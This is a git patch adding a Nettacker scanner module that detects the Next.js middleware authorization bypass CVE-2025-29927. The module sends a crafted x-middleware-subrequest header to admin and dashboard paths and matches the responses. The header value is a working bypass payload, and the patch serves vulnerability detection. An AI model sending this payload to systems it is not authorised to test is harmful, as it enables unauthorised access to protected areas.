From dafc202de592d87de9a223c6c526e8a6749dc515 Mon Sep 17 00:00:00 2001
From: Dami99-b <prosperoluwadamilare@gmail.com>
Date: Mon, 30 Mar 2026 23:03:33 +0100
Subject: [PATCH] feat: add vuln module for NextJS middleware bypass
 CVE-2025-29927 (CISA KEV)

- Sends GET request with x-middleware-subrequest header to detect auth bypass
- Targets protected paths: admin, dashboard, api/admin
- Matches HTTP 200 + Next.js body signatures
- Removed static path to prevent false positives on patched systems
- Fixes #1449
---
 .../modules/vuln/nextjs_cve_2025_29927.yaml   | 57 +++++++++++++++++++
 1 file changed, 57 insertions(+)
 create mode 100644 nettacker/modules/vuln/nextjs_cve_2025_29927.yaml

diff --git a/nettacker/modules/vuln/nextjs_cve_2025_29927.yaml b/nettacker/modules/vuln/nextjs_cve_2025_29927.yaml
new file mode 100644
index 000000000..67dcb5f7c
--- /dev/null
+++ b/nettacker/modules/vuln/nextjs_cve_2025_29927.yaml
@@ -0,0 +1,57 @@
+info:
+  name: nextjs_cve_2025_29927_vuln
+  author: Prosper Okah
+  severity: 9
+  description: CVE-2025-29927 is an unauthenticated authorization bypass vulnerability in Next.js. The framework uses an internal header x-middleware-subrequest to track recursive middleware calls. In affected versions (prior to 12.3.5, 13.5.9, 14.2.25, 15.2.3), this header is not stripped from incoming external requests, allowing attackers to bypass authentication and access control middleware entirely by setting this header in any HTTP request.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-29927
+    - https://nextjs.org/blog/cve-2025-29927
+    - https://github.com/EQSTLab/CVE-2025-29927
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+  profiles:
+    - vuln
+    - http
+    - critical_severity
+    - cve2025
+    - cve
+    - nextjs
+    - auth_bypass
+    - middleware_bypass
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+          x-middleware-subrequest: "middleware:middleware:middleware:middleware:middleware"
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              path:
+                - "admin"
+                - "dashboard"
+                - "api/admin"
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+                - 3000
+                - 8080
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: '200'
+              reverse: false
+            content:
+              regex: "__NEXT_DATA__|_next/|next/dist"
+              reverse: false